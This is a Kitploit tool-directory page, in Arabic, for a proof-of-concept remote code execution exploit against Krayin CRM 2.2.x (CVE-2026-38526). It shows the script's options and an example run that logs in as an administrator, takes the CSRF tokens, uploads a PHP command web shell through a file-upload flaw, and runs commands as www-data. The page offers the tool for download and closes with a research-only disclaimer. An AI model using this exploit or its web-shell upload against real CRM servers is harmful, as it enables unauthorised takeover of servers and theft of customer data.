Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38526-KrayinCRM-RCE — استغلال CVE-2026-38526 | بواسطة infrar3d | Kitploit
أدوات/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce

CVE-2026-38526-KrayinCRM-RCE

استغلال CVE-2026-38526 | بواسطة infrar3d

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد
مشاركة

CVE-2026-38526 - Krayin CRM RCE

تم استغلالها بواسطة infrar3d

هذا هو إثبات مفهوم لتنفيذ التعليمات البرمجية عن بُعد (RCE) مصمم خصيصًا لنظام Krayin CRM الإصدار 2.2.x، وهو نظام مفتوح المصدر لإدارة علاقات العملاء. يقوم السكربت بأتمتة استغلال ثغرة رفع الملفات في الواجهة الإدارية لنظام إدارة علاقات العملاء (CRM) لتحقيق تنفيذ الأوامر عن بُعد على الخادم المستهدف.

الاستخدام:

root@kitploit:~
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND

Krayin CRM RCE Exploit

options:
  -h, --help            show this help message and exit
  -rh, --rhost RHOST    Remote host
  -u, --username USERNAME
                        Username or E-mail
  -p, --password PASSWORD
                        Password
  -c, --command COMMAND
                        Command to execute
                                         

مثال:

root@kitploit:~
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'

[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================
                                                                                         

يقوم هذا السكربت برفع قشرة PHP cmd من revshells.com افتراضيًا.

بعد الاستغلال، يمكنك فتحها في المتصفح وإرسال الأوامر من صفحة الويب.

⚠️ إخلاء مسؤولية ⚠️

هذا البرنامج وكود إثبات المفهوم مقدم لأغراض التعليم والبحث فقط.

  • المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
  • لا تستخدمه ضد أي أنظمة دون إذن مسبق وصريح.
  • استخدام هذه الأدوات لمهاجمة الأهداف دون موافقة غير قانوني.

أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمه بأخلاق ومسؤولية.

تنزيل الأداة